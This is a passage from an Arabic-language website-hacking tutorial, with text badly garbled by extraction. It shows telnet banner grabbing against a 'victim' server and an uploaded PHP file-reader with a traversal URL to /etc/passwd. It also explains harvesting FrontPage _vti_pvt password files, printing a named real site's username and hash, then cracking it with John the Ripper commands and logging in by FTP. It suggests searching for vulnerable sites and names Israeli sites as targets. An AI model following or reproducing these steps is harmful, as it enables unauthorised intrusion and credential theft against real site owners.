‫ﻗﻊاﻟﺬيﺗ ﺮﯾﺪ ﻣﻌ ﺮﻓﺔ‬‫ﻗﻊأﻋﻄﺎكﺑﻌ ﺾاﻟﻤﻌﻠﻮﻣﺎ ت ﻋﻦاﻟﻤﻠﻘﻢ واﻟﺨﺪﻣﺎ تاﻟﻤﻮﺟﻮدةﻓﻲاﻟﻤﻮ‬ ‫ﺘﺠﺪأناﻟﻤﻮ‬ ‫‪-‬ﺳ‬
‫ﻗﺎﺑﻠﯿﺔ دﻋﻤﻪﻟﻠﺒ ﺮﻧﺎﻣ ﺞ ‪ ،‬و ﻣﻦﺗﻠﻚاﻟﺨﺪﻣﺎ ت‬
‫ـ‬‫ﺘﻈﻬ ﺮﻟﻚﺑﺎﻟﺸﻜ ﻞ ‪ mod_frontpage/X‬ﺣﯿﺚ ‪ X‬ﯾ ﺮﻣﺰ ﻻ ﺻﺪارةاﻟ‬ ‫ـ ‪ FrontPage‬و ﺳ‬ ‫ﺧﺪﻣﺔاﻟ‬
‫‪. FrontPage Extensions Server‬‬

‫ـ ‪: Telnet‬‬
‫* ﻋﻦ ﻃ ﺮﯾ ﻖاﻟ‬

‫) ﻣﻼ ﺣﻈﺔ ‪:‬ﺗﺴﺎﻋﺪﻫﺬهاﻟﻄ ﺮﯾﻘﺔﻓﻲ ﻣﻌ ﺮﻓﺔﺑﻌ ﺾاﻟﻤﻌﻠﻮﻣﺎ ت ﻋﻦاﻟﺨﺎدم واﻟﻤﺨ ﺮﺟﺎ تﻫﻲ ﻧﻔ ﺲ ﻣﺨ ﺮﺟﺎ ت‬
‫اﻟﻄ ﺮﯾﻘﺔاﻟﺴﺎﺑﻘﺔ (‬

‫ﺘﻈﻬ ﺮ ‪. Telnet‬‬
‫ﺘﻲ ﺳ‬
‫ﺘﺐﺑﺎﻟﻨﺎﻓﺬةاﻟ‬ ‫ﺘﯿﺎر ‪ Run‬واﻛ‬ ‫‪ -‬ﻣﻦﻗﺎﺋﻤﺔ ‪Start‬ﻗﻢﺑﺎ ﺧ‬
‫ﺘﺎﻟﻲ ‪:‬‬ ‫ﻗﻊ ﻋﺒ ﺮاﻟﻤﻨﻔﺬ ‪٨٠‬ﺑﺎﻟﺸﻜ ﻞاﻟ‬‫‪-‬ﻗﻢﺑﺎﻻﺗﺼﺎ لﺑﺎﻟﻤﻮ‬

‫‪Microsoft Telnet> Open www.Victim.com 80‬‬

‫ﺘﻜﻦاﻟﻄ ﺮﯾﻘﺔ ‪ Method‬ﻫﻲ ‪. Head‬‬


‫‪-‬ﻗﻢﺑﺎرﺳﺎ ل ﻃﻠﺐ ‪Request‬ﻟﻠﺨﺎدم وﻟ‬

‫‪١ ٣٤‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻌﺎﻣ ﻞ ﻣﻊﺑ ﺮوﺗﻮﻛﻮ ل ‪( HTTP‬‬


‫) ﻣﻼ ﺣﻈﺔ ‪ :‬ﻋﻠﯿﻚاﻻﻟﻤﺎمﺑﻜﯿﻔﯿﺔاﻟ‬

‫ﻗﻊاﻟ ﻀ ﺤﯿﺔ و ‪ISP.net‬ﻫﻮاﻟﺒ ﺮوﻛ ﺴﻲ‬


‫ﺘﺎﻟﻲ ﺣﯿﺚ ‪ http://www.Victim.net‬ﻫﻮاﻟﻤﻮ‬‫‪-‬ﻗﻢﺑﺎرﺳﺎ لاﻟ‬
‫اﻟﺨﺎ صﺑﻤﺰوداﻟﺨﺪﻣﺔاﻟﺨﺎ صﺑﻚ ‪:‬‬

‫‪Head www.Victim.net HTTP/1.1‬‬


‫‪Host: ISP.net‬‬
‫‪*/* :Accept‬‬
‫‪Connection: close‬‬

‫ﺘﻈ ﺮﺑ ﻀﻊﺛﻮاﻧﻲ ‪.‬‬ ‫‪-‬اﻧ‬


‫ﺘﻬﺐﻟﻠﺨﺎدم ‪ Server‬ﻣﺜ ﻞﺗﺎرﯾ ﺦ آ ﺧ ﺮﺗﻌﺪﯾ ﻞ‬ ‫ﺘﻠﻢاﻻﺟﺎﺑﺔ ‪ Response‬ﻋﻦاﻟﻄﻠﺐاﻟﺬيارﺳﻠ‬ ‫ﺘﺴ‬ ‫‪-‬ﺳ‬
‫ﺘﻮﻓ ﺮةﺑﻪ ‪.‬‬
‫ﻟﻠﺼﻔ ﺤﺔ و ﻧﻮ عاﻟﻤﻠﻘﻢ واﻟﺨﺪﻣﺎ تاﻟﻤ‬
‫ـ ‪ FrontPage‬و‬ ‫ﺘﺠﺪ ﻧﻔ ﺲاﻟﺬي وﺟﺪﻧﺎهﻓﻲاﻟﻄ ﺮﯾﻘﺔاﻟﺴﺎﺑﻘﺔ و ﻫﻮأن ﺧﺪﻣﺔاﻟ‬ ‫و ﻣﻦ ﺿﻤﻦاﻟﺨﺪﻣﺎ ت ﺳ‬
‫ﺘﻈﻬ ﺮﻟﻚﺑﺎﻟﺸﻜ ﻞ ‪mod_frontpage/X‬‬ ‫ﺳ‬
‫ـ ‪. FrontPage Extensions Server‬‬ ‫ﺣﯿﺚ ‪ X‬ﯾ ﺮﻣﺰ ﻻ ﺻﺪارةاﻟ‬

‫ﺘﻐﻼﻟﻪﻟﯿﺼﺒﺢﻓﻲ ﺻﺎﻟ ﺤﻚ ‪:‬‬


‫@ﻛﯿﻔﯿﺔاﺳ‬

‫ﺘﺎﻟﻲ ‪:‬‬
‫ـ _‪vti_pvt‬ﻗﻢﺑﺎﻟ‬
‫ﺘﻢ و ﺿﻊ ﺻﻼ ﺣﯿﺎ ت ﻋﻠﻰ ﻣﺠﻠﺪاﻟ‬
‫ﻗﻊ ﯾﺪﻋﻢ ﻫﺬهاﻟﺨﺪﻣﺔ وﻟﻢ ﯾ‬
‫اذا ﻋﺜ ﺮ ت ﻋﻠﻰ ﻣﻮ‬

‫ﻗﻊ‬
‫ـ ‪، PHP‬ﻛﻤﺎأن ﻋﻠﻰاﻟﻤﻮ‬
‫ﺘﻨﺎﻓﻬﻲاﻟ‬
‫) ﻣﻼ ﺣﻈﺔ ‪ :‬ﻋﻠﯿﻚاﻻﻟﻤﺎمﺑﻠﻐﺔﺗﻌﻤ ﻞ ﻋﻠﻰ ﻧﺎ ﺣﯿﺔاﻟﺨﺎدم وﻓﻲ ﺣﺎﻟ‬
‫اﻟ ﻀ ﺤﯿﺔ دﻋﻢ ﻫﺬهاﻟﻠﻐﺔ (‬

‫ﻗﻊاﻟ ﻀ ﺤﯿﺔ ‪.‬‬


‫*ﻗﻢﺑﺎﻻﺗﺼﺎ لﺑﺎﻟﻤﻮ‬
‫ﺘﺎﻟﻲ ‪:‬‬
‫ـ ‪ PHP‬و ﺿﻤﻨﻪاﻟ‬
‫ﺘﺪادهﺑ‬ ‫ﺘﻬﻲاﻣ‬‫ﺘ ﺤﻤﯿ ﻞ ﻣﻠ ﻒ ﯾﻨ‬
‫*ﻗﻢﺑ‬

‫>؟‪PHP‬‬

‫؛‬
‫‪("open = FOpen($file, "r$‬‬
‫؛‬
‫‪((get = FGets($open, FileSize($file$‬‬

‫؛‬
‫‪Echo $get‬‬

‫؛‬
‫‪FClose $open‬‬

‫؟<‬

‫ﺘﻮﯾﺎﺗﻪ ﻋﻠﻰ ﺣﺴﺐ ﺣﺠﻤﻪ‬


‫ﺘﺢ ﻣﻠ ﻒ ﻏﯿ ﺮ ﻣﻌﯿﻦﺛﻢ ﯾ ﺤ ﻀ ﺮ ﻣ ﺤ‬‫وﻗﻤﻨﺎﻫﻨﺎﺑ ﺮﻓﻊ ﻣﻠ ﻒ ‪PHP‬ﻟﻠﺨﺎدم ﯾﻘﻮمﺑﻔ‬
‫ﺑﺎﻟﺒﺎﯾ ﺖﺛﻢ ﯾﻌ ﺮ ﺿﻪﺛﻢ ﯾﻐﻠ ﻖاﻟﻤﻠ ﻒ ‪ ،‬واﻵنﻛ ﻞ‬

‫‪١ ٣٥‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻐﯿ ﺮ‬
‫ﺘﻪ واﻟﻤ‬
‫ـﺑﻌﻨﻮاناﻟﻤﻠ ﻒاﻟﺬي ﺣﻤﻠ‬
‫ﻗﻪﺑ‬
‫ﺘﺼﻔﺢ واﻟ ﺤﺎ‬
‫ﻗﻊ ﻋﺒ ﺮاﻟﻤ‬
‫ﻣﺎ ﻋﻠﯿﻚﻓﻌﻠﻪاﻵن ﻫﻮاﻟﺪ ﺧﻮ ل ﻋﻠﻰاﻟﻤﻮ‬
‫‪ file‬واﻟﻤﻠ ﻒاﻟﺬيﺗ ﺮﯾﺪ ﻣﻌﺎﯾﻨﺔاﻟﺸﻔ ﺮة‬
‫اﻟﻤﺼﺪرﯾﺔاﻟﺨﺎ ﺻﺔﺑﻪ ‪ ،‬ﻣﺜﺎ ل ‪:‬‬

‫‪www.Victim.com/uploded_file...../../etc/passwd//:http‬‬

‫ﺘﻄﯿﻊا ﺿﺎﻓﺔاواﻣ ﺮﺗﺴﻤﺢﻟﻚﺑﻤﻌﺎﯾﻨﺔ‬


‫ﺘ ﺤﻤﯿﻠﻪ ‪ ،‬وﺗﺴ‬
‫ﺣﯿﺚ ‪ uploded_file‬ﯾﺸﯿ ﺮ ﻻﺳﻢاﻟﻤﻠ ﻒاﻟﺬيﻗﻤ ﺖﺑ‬
‫اﻟﻤﻠﻔﺎ ت واﻟﻤﺠﻠﺪا تاﻟﻤﻮﺟﻮدةﻓﻲاﻟﺨﺎدم ‪....‬‬

‫‪١ ٣٦‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫"‬ ‫" )>س&ج<( ﰲ اﺧﱰاق اﳌﻮاﻗﻊ ﺑﺜﻐﺮة اﻟﻔﺮوﻧﺖ ﺑﯿﺞ‬

‫‪$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪:‬اﻟﻘﻨﺎ صاﻟﻌ ﺮﺑﻲ‬
‫‪$$$$$$$$$$$$$$‬‬

‫س*‪:‬اﻟﺴﻼم ﻋﻠﯿﻜﻢأ ﺧﻲاﻟﻘﻨﺎ صاﻟﻌ ﺮﺑﻲ‪(:‬‬


‫ﺞ*‪:‬أﻫﻠﯿﻦاﻟﻘﻨﺎ صاﻟﻌ ﺮﺑﻲاﻟﻤﺰﯾ ﻒ‪:D‬‬

‫ﺲ*‪:‬أ ﺣﻢأ ﺣﻢ ‪،‬أﻧﺎﻛﻨ ﺖ ﻋﺎﯾﺰأﺳﺄﻟﻚ ﺷﻮﯾﺔأﺳﺄﻟﺔﻓﻲاﻟﻬﺎﻛﻨ ﺞ‪.‬‬


‫ﺘ ﺮا قاﻷﺟﻬﺰة ‪ ،‬وﻟﻌﺐاﻟﻌﯿﺎ لﻫﺬا !!‬
‫ﺞ*‪:‬ﺗﻔ ﻀ ﻞ ﺣﺒﯿﺒﻲ ‪،‬ﺑ ﺲ ﯾﺎرﯾ ﺖ ﻣﺎﺗﻜﻮن ﻋﻦا ﺧ‬

‫س*‪ :‬ﻻ ﻻ ‪,‬ﺄﻧﺎﺗﻄﻮ تﻛﺜﯿ ﺮ ‪(:‬‬


‫ﺞ*‪:‬أوﻛﻰﺗﻔ ﻀ ﻞ ‪(:‬‬

‫ﺘﺨﺪام ﻫﺬهاﻟﺜﻐ ﺮة ‪.‬‬‫س‪:٢‬ﻟﻘﺪ ﺳﻤﻌ ﺖﻛﺜﯿ ﺮا ﻋﻦﺛﻐ ﺮا ت ﺎﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞ ‪،‬ﻫ ﻞ ﯾﻤﻜﻨﻚﺗﻮ ﺿﯿﺢ ﻃ ﺮﯾﻘﺔاﺳ‬
‫ﺛﻨﯿﻦ‪:D‬‬‫ﺘﺄﻛﯿﺪ ﺣﺒﻲ وﻣﻦ ﻋﯿﻮﻧﻲاﻻ‬ ‫ﺞ‪:٢‬ﺑﺎﻟ‬
‫ـ‬‫ﺘﻲ ﯾﺪﻋﻢ ﺳﯿ ﺮﻓ ﺮاﺗﻬﺎاﻟ‬
‫ﺘﺸﻐﯿ ﻞ ‪ NT & Unix‬ﺎﻟ‬ ‫ﺘﻜﻮن ﻣﻮﺟﻮدةﻓﻲأﻧﻈﻤﺔاﻟ‬ ‫ﻃﺒﻌﺎﺛﻐ ﺮا تاﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞﺑ‬
‫ﻗﻊ ‪(:‬‬ ‫ﺘﻤﻜﻨﻚ ﻣﻦ ﻣﻌ ﺮﻓﺔﻛﻠﻤﺔ ﺳ ﺮاﻷدﻣﯿﻦﺗﺒﻊاﻟﻤﻮ‬ ‫‪FrontPage ,‬ﻮﺑ‬
‫ﺘﺎﻟﯿﺔ‪:‬‬
‫ﺘﻜﻮن ﻣﻮﺟﻮدةﻓﻲاﻟﻤﻠﻔﺎ ت ﺎﻟ‬ ‫ﻮﻛﻠﻤﺎ تاﻟﺴ ﺮ ﻫﺬهﺑ‬
‫‪Administrator.pwd‬‬
‫‪Administrators.pwd‬‬
‫‪Authors.pwd‬‬
‫‪Users.pwd‬‬
‫ﺘﻜﻮن ﻋﺎدةﻓﻲاﻟﻤﺠﻠﺪ‪_vti_pvt‬‬ ‫ﺘﻲﺑ‬ ‫ﺎﻟ‬
‫ﻣﺜ ﻞ ﻫﺬهاﻟﻤﻠ ﻒ ﻣﺜﻼ‪:)http://www.tradesystemlab.com/_vti_pvt/service.pwd :‬‬
‫ﺘﻮبﺑﺪا ﺧﻠﻪ ﻫﻜﺬاﺗﻘ ﺮﯾﺒﺎ‪:‬‬ ‫ﻗﻲ ﻣﻜ‬ ‫ﺘﻼ‬‫ﺘﺢاﻟﻤﻠ ﻒ ‪service.pwd‬ﻫ‬ ‫ﻮﺑﻌﺪﻓ‬
‫‪# -FrontPage-‬‬
‫‪tradesys:FpNTpIDWSk872‬‬
‫ﺘﺨﺪم)‪:‬‬‫ﻮﻫﺬهﻛﻠﻤﺔاﻟﺴ ﺮاﻟﻤﺸﻔ ﺮة واﺳﻢاﻟﻤﺴ‬

‫ﻗﻊﻛﺄدﻣﯿﻦﺑﻬﺬه ﺎﻟﻜﻠﻤﺎ ت ؟؟‪:S‬‬


‫ﺘﺎز ‪ ،‬وﻟﻜﻦﻛﯿ ﻒأد ﺧ ﻞ ﻋﻠﻰاﻟﻤﻮ‬
‫س‪:٣‬أووووه واااااو ﻣﻤ‬
‫ﻗﻊ‬‫ﺘﺨﺪامﺑ ﺮﻧﺎﻣ ﺞا فﺗﻲﺑﻲ ﻣﺜ ﻞﺑ ﺮﻧﺎﻣ ﺞ ‪WS_FTP ,‬ﺄو ﺿﻊﺑﺪ ل ‪www‬ﻓﻲ ﻋﻨﻮاناﻟﻤﻮ‬ ‫ﺞ‪ :‬ﯾﻤﻜﻨﻚاﺳ‬
‫ﻗﻊاﺳﻢ‬‫ﻗﻢﺑﻤﻮ ﺿﻌﻪﻓﻲ ﺷ ﺮﯾﻂاﻟﻌﻨﻮان ‪ ,‬ﻮﺳﯿﻄﻠﺐ ﻣﻨﻚاﻟﻤﻮ‬‫ﻛﻠﻤﺔ ‪ ftp‬ﻣﺜ ﻞ ﻫﺬا ‪: ftp.ebnmasr.com‬ﻮ‬
‫ﻗﻊ ‪(:‬‬
‫ﺘﺨﺪم وﻛﻠﻤﺔاﻟﻤ ﺮورﻟﻠﻤﻮ‬ ‫اﻟﻤﺴ‬

‫ﺘﺨﺪم وﻛﻠﻤﺔاﻟﺴ ﺮ ﻫﺬه ‪:‬‬ ‫س‪ :٤‬ﻣﺸﻜﻮر ﺣﺒﯿﺒﻲ ﻮﻟﻜﻦﻟﯿ ﺶ ﻣﺎﯾﺪ ﺧ ﻞﺑﺎﺳﻢاﻟﻤﺴ‬
‫‪tradesys:FpNTpIDWSk872‬؟؟)‪(N‬‬
‫ﺞ‪:٤‬ﺑﻜ ﻞﺑﺴﺎ ﻃﻪﻷﻧﻬﺎ ﻣﺸﻔ ﺮة !! ‪ ،‬ﯾﻤﻜﻨﻚﻓﻚﺗﺸﻔﯿ ﺮﻫﺎ ﻋﻦ ﻃ ﺮﯾ ﻖﺑ ﺮﻧﺎﻣ ﺞ ﻣﺜ ﻞﺑ ﺮﻧﺎﻣ ﺞ ‪John The‬‬
‫‪Ripper ,‬ﻧﺰﻟﻪ ﻣﻦ ﻫﻨﺎ‪http://www .openwall.com/john :‬‬

‫‪١ ٣٧‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺨﺪم ﻫﺬااﻟﺒ ﺮﻧﺎﻣ ﺞ ‪ ،‬ﻣﻤﻜﻦﺗﺸ ﺮ ﺣﻬﻮﻟﻲأ ﺧﻲاﻟﻌﺰﯾﺰاﻟﻘﻨﺎ صﻟﻮ ﺳﻤ ﺤ ﺖ ؟؟‬ ‫س‪:٥‬أﻫﺎ ‪،‬ﻟﻜﻨﻲ ﻣﺎأﻋ ﺮ فﺄﺳ‬
‫ﺘﺄذن ﻣﻨﻲ ﯾﺎوﻟﺪ !! ‪،‬أﻧﺎﻓﻲاﻟﺨﺪﻣﺔ ‪ ، (:‬ﺷﻮ ف‪:‬اﻧ ﺖأو ل ﻣﺎﺗﻨﺰ لاﻟﺒ ﺮﻧﺎﻣ ﺞ وﺗﻔﻚ ﺿﻐﻄﻪ ‪،‬ﻫﯿﻜﻮن‬ ‫ﺞ‪ :٥‬ﻻﺗﺴ‬
‫ﺘﺢ‬ ‫ﻓﯿﻪ ﻣﺠﻠﺪﯾﻦ ‪: doc & run ,‬ﺎﻟﻲ ﯾﻬﻤﻨﺎ ﻫﻮ ﻣﺠﻠﺪ ‪ run ,‬ﺷﻮ ف‪ :‬ﻋﺸﺎنﺗﺴﻬ ﻞ ﻋﻠﻰ ﻧﻔﺴﻚ وﺑﺪ ل ﻣﺎﺗﻔ‬
‫اﻟﺪوس وﺗﺪ ﺧ ﻞ ﻋﻠﻰ ﻣﺠﻠﺪاﻟﺒ ﺮﻧﺎﻣ ﺞ وﻫﺎﻟﻤﺸﺎﻛ ﻞ وﻛﻤﺎناﻟﺒﻌ ﺾ ﻣﺎﺑﯿﻌ ﺮ ف ﯾﻌﻤ ﻞﻫﺎﻷﺷﯿﺎ ء‪:p :‬‬
‫ﻗﻢﺑﻨﺴﺨﻪ واﻟﺼﻘﻪﻓﻲ ﻣﺠﻠﺪ ‪run ,‬ﺄوﻛﻰ ؟؟‬ ‫ﺎﺑ ﺤﺚﻓﻲ ﺟﻬﺎزك ﻋﻦ ‪: command.com‬ﻮ‬
‫ﻮﺟﯿﺐﻛﻠﻤﺔاﻟﺴ ﺮ ﻫﺬه ‪: tradesys:FpNTpIDWSk872‬ﻮ ﺣﻄﻬﺎﻓﻲ ﻣﻠ ﻒ ‪txt‬ﺑﺎﺳﻢ ‪ passwd‬ﻣﺜﻼ‬
‫ﺘﺎﻟﯿﺔ‪:‬‬‫ﺘﺐﻓﯿﻪاﻷواﻣ ﺮاﻟ‬ ‫ﺘﺢ ‪ command.com‬ﻮاﻛ‬ ‫ﺘﺢ ‪ john.exe ,‬ﺎﻓ‬ ‫و ﺿﻌﻪﻓﻲ ﻣﺠﻠﺪ ‪ run ,‬ﻮﻻﺗﻘﻢﺑﻔ‬
‫ﺘﺨﺪم‬ ‫ﺘﻲﺗﻜﻮن ﻣﻄﺎﺑﻘﻪ ﻻﺳﻢاﻟﻤﺴ‬ ‫>> ‪john -single passwd.txt‬ﻟﯿﺒ ﺤﺚﻟﻚ ﻋﻦاﻟﻜﻠﻤﺎ ت ﺎﻟﺴ ﺮﯾﺔاﻟ‬
‫ﻗﺎمﻓﻘﻂ‬ ‫>> ‪john -i:Digits passwd.txt‬ﻟﯿﺒ ﺤﺚﻟﻚ ﻋﻦاﻷر‬
‫>> ‪john -i:Alpha passwd.txt‬ﻟﯿﺒ ﺤﺚﻟﻚ ﻋﻦاﻟ ﺤ ﺮو ف ﺎﻟﺼﻐﯿ ﺮة‬
‫ﺘﺨﺪمﻫﺬااﻷﻣ ﺮ ‪،‬‬ ‫ﺘﻤﺎﻻ ت ‪ ) ،‬وأﻧﺎ ﻋﻠﻰ ﻃﻮ لأﺳ‬‫>> ‪john -i:all passwd.txt‬ﻟﯿﺒ ﺤﺚﻟﻚ ﻋﻦ ﺟﻤﯿﻊاﻻ ﺣ‬
‫ﺘﻄﻮ ل ﻋﻤﻠﯿﺔاﻟﻔﻚ ﻣﻌﻲ) ‪:D‬‬ ‫ﻋﺸﺎنﻛﺪهﺑ‬
‫ﺘﺠﺪﻛﻠﻤﺔاﻟﺴ ﺮاﻟﻤﺸﻔ ﺮة واﻟﻤﻔﻜﻮﻛﻪﺑﺎﻟﻤﻠ ﻒ ﻫﺬا‪john.pot:‬‬ ‫ﺘﻬﻲاﻟﺒ ﺮﻧﺎﻣ ﺞ ﻣﻦﻓﻚاﻟﻜﻠﻤﺔ ﺳ‬ ‫ﻮﺑﻌﺪﻣﺎ ﯾﻨ‬

‫ﺘﺄﻛﺪأﻧﻪﻫﯿﻔﻚﺗﺸﻔﯿ ﺮﻫﺎ ؟؟‬ ‫س‪ :٦‬ﯾﺎاااااه ‪،‬اﻟﺒ ﺮﻧﺎﻣ ﺞ ﻃﻮ لﻛﺜﯿ ﺮ ‪ ،‬ﻣ‬


‫ﺘﻤﺎﻻ ت‪.‬‬
‫ﺘﻰﻟﻮأ ﺧﺬأﺳﺒﻮ ع؛( ‪،‬ﻷﻧﻪﺑﯿﺠ ﺮب ﺟﻤﯿﻊاﻻ ﺣ‬ ‫ﺞ‪:٦‬أﯾﻮووووه ﻻزم ﯾﻔﻚﺗﺸﻔﯿ ﺮﻫﺎﻓﻲاﻟﻨﻬﺎﯾﺔ ‪ ،‬ﺣ‬
‫ﻮﻣﻤﻜﻦﺗﻌ ﺮ ف ﺣﺎﻟﺔاﻟﺒ ﺮﻧﺎﻣ ﺞﺑﺎﻟ ﻀﻐﻂ ﻋﻠﻰأي زر ﻣﻦﻟﻮ ﺣﺔ ﺎﻟﻤﻔﺎﺗﯿﺢ ‪(:‬‬

‫ﺘﺨﺪم ؟؟‬
‫س‪:٧‬اﻟ ﺤﻤﺪ ﷲ ‪ ،‬ﺧﻼ صاﻧﻔﻜ ﺖﻛﻠﻤﺔاﻟﺴ ﺮ ‪(Y) ,‬ﻟﻜﻦ وﯾﻦاﺳﻢ ﺎﻟﻤﺴ‬
‫ﺘﺨﺪم ( ‪: tradesys‬‬
‫ﺞ‪:٧‬ﻓﻲﻛﻠﻤﺔاﻟﺴ ﺮ ﻫﺬه ‪: tradesys:FpNTpIDWSk872 ,‬ﻫﯿﻜﻮناﺳﻢ ﺎﻟﻤﺴ‬
‫ﺘﻜﻮنﻗﺒ ﻞ ﻋﻼﻣﺔ ‪( :‬‬
‫ﯾﻌﻨﻲاﻟﻜﻠﻤﺔاﻟﻲﺑ‬

‫ﻗﻊ ؟؟ ‪$:‬‬‫س‪:٨‬ﻗﻨﺎااااا ص ‪ ،‬ﻣﻤﻜﻦﺗﻘﻮﻟﻲﻛﯿ ﻒ ﺟﺒ ﺖ ﻫﺎﻟﺜﻐ ﺮة ﻣﻦاﻟﻤﻮ‬


‫ﺘﻬﺎﺑﺎﻟﺒ ﺤﺚاﻟﻌﺸﻮاﺋﻲ ‪ ،‬وﻟﻜﻦاﻧ ﺖﻟﻮﻛﺎن‬
‫ﺞ‪:٨‬ﻫﻬﻬﻬﻬﻬﻬﻬﻬﻪ ‪ ،،،‬وﻟﯿﻪﻫﺎﻟﻮﺟﻪ ﺎﻟﺨﺠﻼن؛( ‪،‬أﻧﺎﺑﺼ ﺮا ﺣﺔ ﺟﺒ‬
‫ﻗﻊ ﻣﻤﻜﻦﺗﻌﻤ ﻞ ﻋﻠﯿﻪ ﺳﻜﺎنﺑﺒ ﺮﻧﺎﻣ ﺞﻓ ﺤ ﺺ ﻣﺜ ﻞﺑ ﺮﻧﺎﻣ ﺞ ﻋﻤ ﺮان )اﻟﻤﻔ ﻀ ﻞﻟﺪي ) ‪ :D‬ﻋﺸﺎنﺗﻄﻠﻊ‬ ‫ﻋﻨﻚ ﻣﻮ‬
‫ﻗﻊ ‪(:‬‬‫اﻟﺜﻐ ﺮا ت ﺎﻟﻤﻮﺟﻮدةﺑﺎﻟﻤﻮ‬

‫س‪ :٩‬ﻃﯿﺐأﻧﺎ ﻋﻨﺪي ﺳﺆاﻟﯿﻦ ﻋﺎﻟﺠﻮاباﻟﻲﻓﺎ ت ده ‪،‬ﻫﺄﺳﺄ ل ﻮا ﺣﺪاﻷو ل ‪، (:‬اﯾﻪ ﻃ ﺮﯾﻘﺔاﻟﺒ ﺤﺚاﻟﻌﺸﻮاﺋﻲ‬
‫ﻫﺬه ؟؟‬
‫ﻗﻲ‬
‫ـ ‪ spiders‬ﻋﺸﺎنﺗﻼ‬ ‫ﺘﺨﺪماﻟ‬ ‫ﺞ‪:‬أ ﺣﻢأ ﺣﻢ ‪،‬ﻫﺬهاﻟﻄ ﺮﯾﻘﺔ ‪ :‬ﺎﻧﻚﺗﺒ ﺤﺚ ﻋﻦﺛﻐ ﺮة ﻣﻌﯿﻨﺔﻓﻲ ﻣ ﺤ ﺮكﺑ ﺤﺚ ﯾﺴ‬
‫ﻗﻮﻟﻚﻟﻚ ﻋﻠﻰأي‬ ‫ﺘﺨﺪماﻟﺴﺒﺎﯾﺪرز ‪،‬ﻟﻜﻦﻟﻦأ‬ ‫ﺘﺴ‬‫ﻗﻊﻛﺜﯿ ﺮةﺑ‬ ‫ﻗﻊﻛﺜﯿﯿﯿ ﺮةﻓﯿﻬﺎاﻟﺜﻐ ﺮةﻫﺬه ‪،‬ﻓﻲ ﻃﺒﻌﺎ ﻣﻮا‬ ‫ﻣﻮا‬
‫ﻗﻊ‬
‫ﺘﺎﺋ ﺞﺗﻜﻮن ﻣﻮا‬
‫ﻗﻊاﺳ ﺮاﺋﯿﻠﻲ ‪ ،‬ﻋﺸﺎن ﻣﻌﻈﻢ ﺎﻟﻨ‬ ‫ﻗﻊ ‪: walla.co.il‬ﻮ ﻃﺒﻌﺎﻫﺬا ﻣﻮ‬ ‫ﻮا ﺣﺪة ﻣﻨﻬﺎ ‪،‬اﻻ ﻫﺬااﻟﻤﻮ‬
‫اﺳ ﺮاﺋﯿﻠﯿﺔ؛( ‪.‬‬

‫‪١ ٣٨‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻚ زﯾﻦ !!‬ ‫ﺲ‪ :١٠‬ﻣﻤﻤﻤﻢ ‪،‬ﻛﯿ ﻒ ﯾﻌﻨﻲﺗﺒ ﺤﺚ ﻋﻦﺛﻐ ﺮة ﻣﻌﯿﻨﻪ ؟؟ ‪ ،‬ﻣﺎﻓﻬﻤ‬
‫ﻗﻊاﻻﻟﻠﺒ ﺤﺚ ﻋﻦﺛﻐ ﺮا ت ﺎﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞ ‪ ، $:‬ﯾﻌﻨﻲاﻧ ﺖ ﻣﺜﻼ ﻋﺎﯾﺰﺗﺒ ﺤﺚ ﻋﻦ‬‫ﺘﺨﺪم ﻫﺎﻟﻤﻮا‬‫ﺞ‪:١٠‬أﻧﺎ وا ﷲ ﻣﺎأﺳ‬
‫ﺘﺐ ﺎﯾﻪ ؟؟ ‪ ،‬ﻣﺎﻧ ﺖﻛﺎﺗﺐ ﻏﯿ ﺮﻛﻠﻤﺔ وا ﺣﺪة ‪،‬ﻫﺬه )‪: service.pwd :) :‬‬ ‫ﺘﻜ‬ ‫ﺘﻲﺗﻢ ذﻛ ﺮﻫﺎ ﺳﺎﺑﻘﺎ ‪،‬ﻫ‬ ‫اﻟﺜﻐ ﺮةاﻟ‬
‫)‪:‬‬

‫س‪:١١‬ﺄﻫﺎااااا ‪ ،‬ﻣﺸﻜﻮر ﺣﺒﯿﺒﻲ ‪،‬ﻛﻨ ﺖ ﻋﺎﯾﺰأﺳﺄﻟﻚﻛﻤﺎن ﻋﻦﻛﯿﻔﯿﺔ ﻋﻤ ﻞﺑ ﺮاﻣ ﺞاﻟﺴﻜﺎن ﻋﻠﻰ ﺎﻟﺜﻐ ﺮا ت ‪(:‬‬
‫ﺘﺒﺪأﺗﺠ ﺮبﺛﻐ ﺮة‬ ‫ـ ‪ EXPLOITES ,‬ﻮﺑ‬ ‫ﺘﻜﻮنﻓﯿﻬﺎ ﻣﺠﻤﻮﻋﺔﻛﺒﯿ ﺮة ﻣﻦاﻟﺜﻐ ﺮا تأواﻟ‬ ‫ﺞ‪:١١‬اﻟﺒ ﺮاﻣ ﺞﻫﺬهﺑ‬
‫ـ ‪EXPLOITES ,‬ﻫﺬا‬ ‫ﻗﻊ ﺮﻫﯿﯿﯿﺐ ﻋﺸﺎنﺗﺠﯿﺐ ﻣﻨﻪاﻟ‬ ‫ﺘﺎﺋ ﺞ ‪ ، (:‬وﻓﻲ ﻣﻮ‬
‫ﻗﻊ ‪ ،‬وﺗﻄﻠﻌﻠﻚاﻟﻨ‬
‫ﺛﻐ ﺮة ﻋﻠﻰاﻟﻤﻮ‬
‫ﻫﻮ‪... http://www.ussrback.com/ :‬‬

‫" ﺷﺮح ﺑﺮﻧﺎﻣﺞ ‪ Shadow Scan Security‬ﻟﺘﺤﻠﯿﻞ اﳌﻮﻗﻊ "‬

‫‪١ ٣٩‬‬
